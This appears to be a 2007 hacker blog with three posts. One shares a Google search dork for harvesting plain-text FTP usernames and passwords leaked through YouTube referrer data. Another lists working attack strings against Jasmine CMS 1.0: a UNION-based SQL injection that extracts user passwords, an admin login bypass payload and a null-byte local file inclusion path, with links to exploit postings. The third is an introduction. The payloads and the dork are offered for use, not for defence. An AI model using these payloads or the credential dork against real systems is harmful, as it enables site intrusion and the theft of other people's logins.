Tuesday 19 June 2007

Google indexes FTP Credentials from YouTube...How Ironic!

Lyecdevf (a member of the w4ck1ng community) recently started a thread on how Google indexes plain-text FTP credentials of YouTube users.

In his own words:

"This is basically a google dork. What basically happens is that if someone is logged in to his/her FTP account and checks a page which embeds a YouTube video through the FTP client, YouTube will register that as a hit from "username:password@domain.tld", simply put.

Which means that you are going to get his login information to his FTP server. Enjoy!

site:youtube.com "clicks from ftp @""

Which is a pretty cool find. But does anybody see the irony in this? I certainly do!

Original Thread:
http://www.w4ck1ng.com/board/showthread.php/new-youtube-exploit-ftp-5521.html
Posted by at 1 comment:

Multiple Vulnerabilities In Jasmine CMS 1.0

Multiple Vulnerabilities In Jasmine CMS 1.0

Foreword:

If your thinking about installing this appauling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. To list all the possible vulnerablities would just be silly so i'll list one of every attack type:

SQL Injection:

news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*

Admin Login Bypass:

Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*

Password = Anything or Nothing

Local File Inclusion:

admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00

...and i'm pretty sure there are tons of XSS vulns in here too.

Exploit:

http://www.w4ck1ng.com/board/showthread.php/0day-jasmine-cms-1-5525.html?p=22785
http://milw0rm.com/exploits/4081
Posted by at No comments:

Monday 18 June 2007

First post, but someone took my site!

So i finally decided to get with the times and start up my own weblog. I don't usually conform to online trends like MySpace, Facebook & blogs in general. That doesn't mean i don't like visiting other peoples'...just don't like playing along.

So there's me thinking i'm gonna have a nice blog url to give people (silentz.blogspot.com)...but no, someone already took that about 5 years ago and decided not to use it! Oh well, geuss i'll have to make do with the one i've got.

This blog will be more or less a place for me to release my exploits but more of a place to ramble on about the actual vulnerability. Also to just air my views on general information security issues and whatnot.

I hope you enjoy it!
Silentz

Posted by at No comments:
Subscribe to: Posts (Atom)